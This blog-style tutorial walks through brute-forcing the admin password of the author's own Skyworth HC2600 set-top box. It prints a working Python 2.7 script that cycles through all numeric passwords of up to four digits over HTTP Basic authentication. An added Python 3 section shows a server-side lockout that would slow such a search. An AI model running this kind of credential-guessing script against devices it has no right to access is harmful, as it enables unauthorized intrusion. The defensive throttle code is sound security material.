Brute-forcing the Skyworth HC2600 set-top box management password with a Python script
Cable TV was recently installed at home with three Skyworth HC2600 set-top boxes, each of which also works as a wireless router.
The free Internet access is no big deal, but the built-in Wi-Fi in the set-top box is a letdown: it only supports 150 Mbps 802.11n in the 2.4 GHz band. The 2.4 GHz band is already very crowded, so the user experience is poor. Running it alongside a dual-band wireless router that supports 802.11ac may even be counterproductive because of interference.
However, any configuration change on the HC2600 set-top box requires the administrator password. According to information found on the Internet, the administrator user name of the HC2600 seems to be admin (confirmed later), but the password could not be determined.
So I wrote a Python script to try it out. The cracking procedure is as follows:
First, connect the computer to the Ethernet interface of the set-top box through the network cable. The computer will automatically obtain the IP address through DHCP.
Install the latest release of Python 2.7, create a new file named tvbox.py, and enter the following content:
import base64, socket, urllib2


def login(url, username, password):
    # Probe without credentials until the box answers 401 (auth required).
    while True:
        try:
            request1 = urllib2.Request(url)
            response1 = urllib2.urlopen(request1, timeout = 2) # 2 seconds
        except socket.timeout, e: # timeout handler for Python 2.7
            print "Login timed out"
            continue
        except urllib2.URLError, e:
            if e.code != 401:
                raise
            else:
                break
    # Repeat the request with HTTP Basic credentials; 401 means wrong password.
    while True:
        try:
            request2 = urllib2.Request(url)
            base64string = base64.encodestring('%s:%s' % (username, password)).replace('\n', '')
            request2.add_header("Authorization", "Basic %s" % base64string)
            response2 = urllib2.urlopen(request2, timeout = 2) # 2 seconds
            return True
        except socket.timeout, e: # timeout handler for Python 2.7
            print "Login timed out"
            continue
        except urllib2.URLError, e:
            if e.code == 401:
                return False


def main():
    for length in range(1, 5):
        end = 10 ** length
        print "Trying length %d (start = 0, end = %d)" % (length, end)
        for i in range(0, end):
            pattern = "%%0%dd" % length
            password = pattern % i
            if login("http://192.168.99.1", "admin", password):
                print "Password found: %s" % password
                return  # stop at the first hit instead of moving on to the next length
            else:
                print "%s" % password


main()
The script above assumes that the set-top box is reachable at 192.168.99.1. If your configuration is different, modify the URL in the login() call on line 41 of tvbox.py.
Run tvbox.py.
The script tries all 11110 pure-digit passwords (0-9, 00-99, 000-999 and 0000-9999); judging by eye, it runs at around 100 attempts per second.
PS: If you try to log in with a browser, after three wrong passwords you have to refresh the page before trying again. This limit is imposed by the browser, and there is no such restriction when using a script.
......
Unexpectedly, the password turned up quickly: 0000, thanks to the installation staff. Scanning every possible 8-digit numeric password could take a dozen days.
Tip: The script above only works with Python 2.7. If you are using another version, you may need to modify the code.
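The three-attempt limit mentioned in the PS lives in the browser, so nothing on the device slowed the script down. As an added example (Python 3, not part of the original post and not the set-top box's firmware), the code below implements a server-side throttle with doubling lockouts and replays the post's digit search against it on a simulated clock; the thresholds, the client address and all names are assumptions.

```python
# Added example (not from the original post): server-side failed-login throttle.
# MAX_FAILURES, BASE_LOCK_S, MAX_LOCK_S and CLIENT are assumed/constructed values.
MAX_FAILURES = 3        # failures allowed before a lockout starts
BASE_LOCK_S = 30.0      # length of the first lockout, in seconds
MAX_LOCK_S = 3600.0     # cap on the doubling lockout
CLIENT = "192.168.99.2" # constructed client address used by the simulation


class LoginThrottle:
    """Tracks failed logins per client and enforces doubling lockouts."""

    def __init__(self):
        self._state = {}  # client -> [failures in current run, lockouts so far, locked_until]

    def retry_after(self, client, now):
        """Seconds the client must still wait; 0.0 means an attempt is allowed."""
        locked_until = self._state.get(client, [0, 0, 0.0])[2]
        return max(0.0, locked_until - now)

    def record(self, client, success, now):
        """Update state after a checked attempt (call only when retry_after is 0)."""
        if success:
            self._state.pop(client, None)
            return
        st = self._state.setdefault(client, [0, 0, 0.0])
        st[0] += 1
        if st[0] >= MAX_FAILURES:
            st[2] = now + min(BASE_LOCK_S * 2 ** min(st[1], 16), MAX_LOCK_S)
            st[0] = 0
            st[1] += 1


def simulate_search(candidates, secret, per_try_s=0.01):
    """Replay a guess list from one client against the throttle on a
    simulated clock; returns (attempts made, elapsed seconds)."""
    throttle, now = LoginThrottle(), 0.0
    for attempts, guess in enumerate(candidates, 1):
        now += throttle.retry_after(CLIENT, now)  # wait out any active lockout
        now += per_try_s                          # ~100 guesses/s, as in the post
        ok = guess == secret
        throttle.record(CLIENT, ok, now)
        if ok:
            return attempts, now
    return len(candidates), now


def digit_candidates(max_len):
    """The zero-padded numeric guesses the post enumerates: 0-9, 00-99, ..."""
    return ["%0*d" % (n, i) for n in range(1, max_len + 1) for i in range(10 ** n)]
```

Reaching 0000 takes 1111 guesses, about 11 seconds at the post's rate with no throttle; under this policy `simulate_search(digit_candidates(4), "0000")` reports roughly 15 days of simulated time for the same guesses.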